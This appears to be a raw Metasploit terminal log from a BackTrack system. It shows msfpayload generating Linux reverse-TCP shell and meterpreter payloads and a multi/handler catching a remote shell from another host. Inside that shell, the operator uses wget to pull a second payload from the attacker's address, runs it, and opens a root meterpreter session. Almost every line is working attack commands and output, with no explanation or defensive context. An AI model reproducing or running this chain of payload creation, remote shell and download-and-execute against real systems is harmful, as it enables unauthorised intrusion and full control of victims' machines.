root@bt:~# clearroot@bt:~# msfpayload linux/meterpreter/reverse_tcp LHOST=10

1. root@bt:~# clear
2.  
3. root@bt:~# msfpayload linux/meterpreter/reverse_tcp LHOST=10.254.254.107 LPORT=1337 X > /root/out
4. Invalid payload: linux/meterpreter/reverse_tcp
5. root@bt:~# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=10.254.254.107 LPORT=1337 X > /root/out
6. Created by msfpayload (http://www.metasploit.com).
7. Payload: linux/x86/meterpreter/reverse_tcp
8. Length: 50
9. Options: {"LHOST"=>"10.254.254.107", "LPORT"=>"1337"}
10.  
11. root@bt:~# msfpayload linux/x86/shell/reverse_tcp LHOST=10.254.254.107 LPORT=4444 X > /root/test
12. Created by msfpayload (http://www.metasploit.com).
13. Payload: linux/x86/shell/reverse_tcp
14. Length: 50
15. Options: {"LHOST"=>"10.254.254.107", "LPORT"=>"4444"}
16.  
17. root@bt:~# msfconsole
18.  
19.  
20. IIIIII dTb.dTb _.---._
21. II 4' v 'B .'"".'/|`.""'.
22. II 6. .P : .' / | `. :
23. II 'T;. .;P' '.' / | `.'
24. II 'T; ;P' `. / | .'
25. IIIIII 'YvP' `-.__|__.-'
26.  
27. I love shells --egypt
28.  
29.  
30. =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
31. + -- --=[ 798 exploits - 440 auxiliary - 148 post
32. + -- --=[ 246 payloads - 27 encoders - 8 nops
33. =[ svn r14672 updated today (2012.02.01)
34.  
35. msf > use multi/handler
36. msf exploit(handler) > set LHOST 0.0.0.0
37. LHOST => 0.0.0.0
38. msf exploit(handler) > set LPORT 1337
39. LPORT => 1337
40. msf exploit(handler) > set PAYLOAD linux/x86/shell/reverse_tcp
41. PAYLOAD => linux/x86/shell/reverse_tcp
42. msf exploit(handler) > exploit -j
43. [*] Exploit running as background job.
44.  
45. [*] Started reverse handler on 0.0.0.0:1337
46.  
47. [*] Starting the payload handler...
48. msf exploit(handler) > [*] Sending stage (36 bytes) to 10.254.254.87
49. [*] Command shell session 1 opened (10.254.254.107:1337 -> 10.254.254.87:58809) at 2012-02-01 13:18:46 +0000
50.  
51. msf exploit(handler) > sessions
52.  
53. Active sessions
54. ===============
55.  
56. Id Type Information Connection
57. -- ---- ----------- ----------
58. 1 shell linux 10.254.254.107:1337 -> 10.254.254.87:58809
59.  
60. msf exploit(handler) > set LPORT 4444
61. LPORT => 4444
62. msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
63. PAYLOAD => linux/x86/meterpreter/reverse_tcp
64. msf exploit(handler) > exploit -j
65. [*] Exploit running as background job.
66.  
67. [*] Started reverse handler on 0.0.0.0:4444
68. [*] Starting the payload handler...
69. msf exploit(handler) > sessions -i 1
70. [*] Starting interaction with 1...
71.  
72. ls
73. Desktop
74. Documents
75. Downloads
76. Firefox_wallpaper.png
77. Music
78. Pictures
79. Public
80. Templates
81. Videos
82. examples.desktop
83. out
84. uname -a
85. Linux zY0D0X 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
86. wget http://10.254.254.107/test
87. --2012-02-01 13:20:23-- http://10.254.254.107/test
88. Connecting to 10.254.254.107:80... connected.
89. HTTP request sent, awaiting response... 200 OK
90. Length: 134 [text/plain]
91. Saving to: `test'
92.  
93. 0K 100% 12.5M=0s
94.  
95. 2012-02-01 13:20:23 (12.5 MB/s) - `test' saved [134/134]
96.  
97.  
98. chmod 755 test
99. ./test &
100. [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
101.  
102. [*] Sending stage (1126400 bytes) to 10.254.254.87
103.  
104. [*] Meterpreter session 2 opened (10.254.254.107:4444 -> 10.254.254.87:54780) at 2012-02-01 13:20:40 +0000
105.  
106. exit
107.  
108. [*] Command shell session 1 closed. Reason: Died from EOFError
109.  
110. msf exploit(handler) > sessions
111.  
112. Active sessions
113. ===============
114.  
115. Id Type Information Connection
116. -- ---- ----------- ----------
117. 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 @ zY0D0X 10.254.254.107:4444 -> 10.254.254.87:54780
118.  
119. msf exploit(handler) > sessions -i 2
120. [*] Starting interaction with 2...
121.  
122. meterpreter >